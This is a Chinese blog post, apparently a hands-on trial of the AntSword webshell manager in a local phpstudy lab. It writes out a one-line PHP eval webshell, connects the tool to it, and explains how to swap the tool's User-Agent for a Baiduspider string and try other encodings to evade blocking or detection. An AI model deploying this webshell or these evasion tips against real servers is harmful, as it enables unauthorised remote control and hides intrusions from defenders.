PJzhang:蟻劍webshell管理工具試用

貓寧!!!

操作系統環境windows 7

官方文檔

https://doc.u0u.us/zh-hans/index.html

https://github.com/AntSwordProject/AntSword-Loader(國外github地址)

https://gitee.com/AntSwordProject/AntSword-Loader(國內gitee地址)

https://github.com/AntSwordProject/AntSword-Loader/releases/download/4.0.3/AntSword-Loader-v4.0.3-win32-x64.zip(下載)

https://github.com/AntSwordProject/antSword(下載)

antSword-master.zip

AntSword-Loader-v4.0.3-win32-x64.zip

分別解壓

進入AntSword-Loader-v4.0.3-win32-x64,運行AntSword.exe

初始化,加載antSword-master文件夾

再次運行AntSword.exe,可以正常使用了

分類目錄添加分類

數據管理右鍵空白添加數據

phpstudy啓動,在C:\phpstudy_pro\WWW目錄下編寫一個php小馬

內容,命名爲xiaozhupeiqi.php

<?php eval($_POST['xiaozhupeiqi']); ?>

http://192.168.43.241/xiaozhupeiqi.php

連接密碼:xiaozhupeiqi

添加成功,右鍵有虛擬終端,文件管理,數據操作,瀏覽網站的功能

代理設置127.0.0.1 8081 http,burpsuite對應設置,可以通過測試抓取流量

默認UA User-Agent: antSword/v2.1

進入antSword-master\modules文件夾,找到request.js,update.js,以antSword關鍵詞搜索

update.js的

  .set('User-Agent', "antSword/v2.0")

request.js的

const USER_AGENT = 'antSword/v2.1';

使用百度爬蟲UA

Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)

在請求信息中心臨時修改UA也是可以的,基礎配置中有不同的編碼可以嘗試,以繞過攔截或者檢測。

~~~

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章